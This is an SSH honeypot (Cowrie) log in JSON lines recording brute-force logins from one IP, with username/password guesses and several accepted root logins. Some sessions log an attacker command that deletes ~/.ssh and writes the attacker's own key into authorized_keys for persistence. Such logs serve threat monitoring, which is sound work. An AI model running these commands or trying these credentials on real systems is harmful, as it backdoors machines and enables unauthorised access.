{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:05:09.145247Z","src_ip":"212.227.235.229","session":"9b30753c0ed1"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"12345678","message":"login attempt [hammer/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T02:05:09.527110Z","src_ip":"212.227.235.229","session":"9b30753c0ed1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:05:10.615010Z","src_ip":"212.227.235.229","session":"9b30753c0ed1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32942,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dadd29ef64a","protocol":"ssh","message":"New connection: 212.227.235.229:32942 (1.2.3.4:22) [session: 1dadd29ef64a]","sensor":"my-vps","timestamp":"2025-09-09T02:05:26.917086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:05:26.917997Z","src_ip":"212.227.235.229","session":"1dadd29ef64a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:05:27.152570Z","src_ip":"212.227.235.229","session":"1dadd29ef64a"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch@123","message":"login attempt [elasticsearch/elasticsearch@123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:05:28.133212Z","src_ip":"212.227.235.229","session":"1dadd29ef64a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:05:29.371052Z","src_ip":"212.227.235.229","session":"1dadd29ef64a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57874,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ee9dae8aacf","protocol":"ssh","message":"New connection: 212.227.235.229:57874 (1.2.3.4:22) [session: 2ee9dae8aacf]","sensor":"my-vps","timestamp":"2025-09-09T02:05:35.152468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:05:35.153361Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:05:35.394622Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@111","message":"login attempt [root/Admin@111] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:05:36.399638Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:05:36.901943Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:05:36.902597Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:05:36.903597Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:05:37.146421Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:05:37.733971Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:05:37.734655Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:05:37.978588Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:05:37.979541Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57878,"dst_ip":"1.2.3.4","dst_port":22,"session":"36407327b1df","protocol":"ssh","message":"New connection: 212.227.235.229:57878 (1.2.3.4:22) [session: 36407327b1df]","sensor":"my-vps","timestamp":"2025-09-09T02:05:38.196801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:05:38.197803Z","src_ip":"212.227.235.229","session":"36407327b1df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:05:38.430462Z","src_ip":"212.227.235.229","session":"36407327b1df"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:05:39.390478Z","src_ip":"212.227.235.229","session":"36407327b1df"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:05:40.623625Z","src_ip":"212.227.235.229","session":"36407327b1df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57888,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa55dbfb8328","protocol":"ssh","message":"New connection: 212.227.235.229:57888 (1.2.3.4:22) [session: aa55dbfb8328]","sensor":"my-vps","timestamp":"2025-09-09T02:05:40.874255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:05:40.875040Z","src_ip":"212.227.235.229","session":"aa55dbfb8328"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:05:41.115589Z","src_ip":"212.227.235.229","session":"aa55dbfb8328"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:05:42.119323Z","src_ip":"212.227.235.229","session":"aa55dbfb8328"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:05:42.361615Z","src_ip":"212.227.235.229","session":"2ee9dae8aacf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:05:42.362532Z","src_ip":"212.227.235.229","session":"aa55dbfb8328"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:05:42.385512Z","src_ip":"212.227.235.229","session":"aaeb69afd317"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:05:42.386152Z","src_ip":"212.227.235.229","session":"aaeb69afd317"}
{"eventid":"cowrie.session.closed","duration":"60.1","message":"Connection lost after 60.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:05:42.387691Z","src_ip":"212.227.235.229","session":"aaeb69afd317"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36310,"dst_ip":"1.2.3.4","dst_port":22,"session":"9955f20b9538","protocol":"ssh","message":"New connection: 212.227.235.229:36310 (1.2.3.4:22) [session: 9955f20b9538]","sensor":"my-vps","timestamp":"2025-09-09T02:05:43.234372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:05:43.235489Z","src_ip":"212.227.235.229","session":"9955f20b9538"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:05:43.344864Z","src_ip":"212.227.235.229","session":"9955f20b9538"}
{"eventid":"cowrie.login.failed","username":"service","password":"!","message":"login attempt [service/!] failed","sensor":"my-vps","timestamp":"2025-09-09T02:05:43.824667Z","src_ip":"212.227.235.229","session":"9955f20b9538"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:05:44.936530Z","src_ip":"212.227.235.229","session":"9955f20b9538"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42308,"dst_ip":"1.2.3.4","dst_port":22,"session":"831964fc4bd3","protocol":"ssh","message":"New connection: 212.227.235.229:42308 (1.2.3.4:22) [session: 831964fc4bd3]","sensor":"my-vps","timestamp":"2025-09-09T02:06:08.742764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:06:08.744140Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:06:08.831556Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.login.success","username":"root","password":"tronic","message":"login attempt [root/tronic] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:06:09.222963Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:06:09.452057Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:06:09.452877Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:06:09.453888Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:06:09.542779Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:06:09.733813Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:06:09.734485Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:06:09.823985Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
